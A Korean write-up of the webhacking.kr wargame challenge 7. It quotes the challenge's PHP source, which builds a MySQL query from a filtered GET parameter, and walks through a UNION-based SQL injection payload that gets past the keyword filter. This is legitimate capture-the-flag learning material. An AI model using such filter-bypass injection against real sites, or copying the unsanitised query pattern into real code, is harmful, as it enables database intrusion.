webhacking.kr 7번

7번을 풀어보장.

뭐 인증을 하라는 문제인듯.

소스를 보자.

<?php

$go=$_GET['val']; //get방식으로 val의 값을 받아옴.

if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }

echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");

if(preg_match("/2|-|\+|from|_|=|\\s|\*|\//i",$go)) exit("Access Denied!"); //필터링 해줌.

$db = dbconnect();

$rand=rand(1,5); //1~5중 랜덤 값에 따라 쿼리문 다르게 넣어줌.

if($rand==1){

$result=mysqli_query($db,"select lv from chall7 where lv=($go)") or die("nice try!");

}

if($rand==2){

$result=mysqli_query($db,"select lv from chall7 where lv=(($go))") or die("nice try!");

}

if($rand==3){

$result=mysqli_query($db,"select lv from chall7 where lv=((($go)))") or die("nice try!");

}

if($rand==4){

$result=mysqli_query($db,"select lv from chall7 where lv=(((($go))))") or die("nice try!");

}

if($rand==5){

$result=mysqli_query($db,"select lv from chall7 where lv=((((($go)))))") or die("nice try!");

}

$data=mysqli_fetch_array($result);

if(!$data[0]) { echo("query error"); exit(); }

if($data[0]==1){ //배열 0번째,즉 테이블에서 가져온 값이 1이면 아랫줄 출력

echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=\"alert('Access_Denied!')\"><p>");

}

elseif($data[0]==2){ //테이블에서 가져온 값이 2이면 아랫줄 출력. 이게 답

echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=\"alert('Hello admin')\"><p>");

solve(7);

}

?>

이렇게 되어 있다.

즉 val값에 2를  넣어주면 된다.

하지만 문제는 2가 필터링 되기 때문에 다르게 접근해야한다.

2를 5-3으로 접근하려 했지만 -도 필터링 된다. 1+1도 +가 필터링

그러면 아스키코드로 가보자.

2는 10진수로는 50이고 16진수로는 0x32이다. 10진수를 쓰면 되겠다.

val=char(50) 이렇게 하면 var=2로 입력된다.

쿼리 에러가 난다.

왜지..

그럼 union을 활용해야겠다.

val=1)union(select(char(50)) 이렇게 넣어주면 쿼리문이

"select lv from chall7 where lv=($go)"

"select lv from chall7 where lv=(1)union(select(char(50)))"이렇게 들어간다.

근데 1~5의 랜덤수로 쿼리가 들어가니 5번정도 저렇게 시도를 해보면 언젠가 1일 때 

쿼리문이 맞아 떨어진다.